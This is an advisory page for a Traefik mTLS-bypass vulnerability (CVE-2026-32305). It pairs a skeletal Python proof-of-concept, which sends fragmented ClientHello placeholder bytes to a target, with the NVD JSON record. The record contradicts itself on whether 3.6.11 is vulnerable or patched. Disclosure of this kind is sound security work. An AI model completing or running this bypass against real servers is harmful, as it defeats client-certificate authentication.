CVE-2026-32305

# Proof of Concept for CVE-2026-32305 # This script demonstrates how to send a fragmented ClientHello # to bypass mTLS checks in vulnerable Traefik versions. import socket import struct def send_fragmented_clienthello(target_ip, target_port): # Standard TCP connection s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) # In a real exploit, these bytes would be a valid TLS ClientHello # split into two records. The SNI should be in the second record # or split across the boundary to trigger the EOF in SNI extraction. # Record 1: Partial ClientHello (Header + partial payload) # Content type: Handshake (0x16) # Version: TLS 1.2 (0x03, 0x01) # Length: Length of fragment 1 fragment_1 = bytes.fromhex("16030100 01") # Simplified header # Record 2: Rest of ClientHello (containing SNI) fragment_2 = bytes.fromhex("16030100 02") # Simplified header # Send fragments s.send(fragment_1) s.send(fragment_2) # Check if server responds without requesting a client certificate response = s.recv(4096) if response: print("[+] Connection established. Check if mTLS was bypassed.") s.close() # Usage: send_fragmented_clienthello('127.0.0.1', 443)

{"cve": {"id": "CVE-2026-32305", "sourceIdentifier": "[email protected]", "published": "2026-03-20T11:18:02.360", "lastModified": "2026-03-24T15:15:55.563", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 are vulnerable to mTLS bypass through the TLS SNI pre-sniffing logic related to fragmented ClientHello packets. When a TLS ClientHello is fragmented across multiple records, Traefik's SNI extraction may fail with an EOF and return an empty SNI. The TCP router then falls back to the default TLS configuration, which does not require client certificates by default. This allows an attacker to bypass route-level mTLS enforcement and access services that should require mutual TLS authentication. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2."}, {"lang": "es", "value": "Traefik es un proxy inverso HTTP y balanceador de carga. Las versiones 2.11.40 e inferiores, 3.0.0-beta1 hasta 3.6.11, y 3.7.0-ea.1 son vulnerables a un bypass de mTLS a través de la lógica de pre-sniffing de SNI de TLS relacionada con paquetes ClientHello fragmentados. Cuando un ClientHello de TLS se fragmenta en múltiples registros, la extracción de SNI de Traefik puede fallar con un EOF y devolver un SNI vacío. El router TCP entonces recurre a la configuración TLS predeterminada, que no requiere certificados de cliente por defecto. Esto permite a un atacante saltarse la aplicación de mTLS a nivel de ruta y acceder a servicios que deberían requerir autenticación TLS mutua. Este problema está parcheado en las versiones 2.11.41, 3.6.11 y 3.7.0-ea.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-1188"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.11.41", "matchCriteriaId": "440A1D58-1FFD-408A-A6B0-25E23F5C24AF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndIncluding": "3.6.11", "matchCriteriaId": "90620FAD-4F72-465E-A744-D62559C92F18"}, {"vulnerable": true, "criteria": "cpe:2.3:a:traefik:traefik:3.7.0:ea1:*:*:*:*:*:*", "matchCriteriaId": "7881B288-5141-4508-AB71-3F7586168437"}]}]}], "references": [{"url": "https://github.com/traefik/traefik/releases/tag/v2.11.41", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/traefik/traefik/releases/tag/v3.6.11", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https: ... (truncated)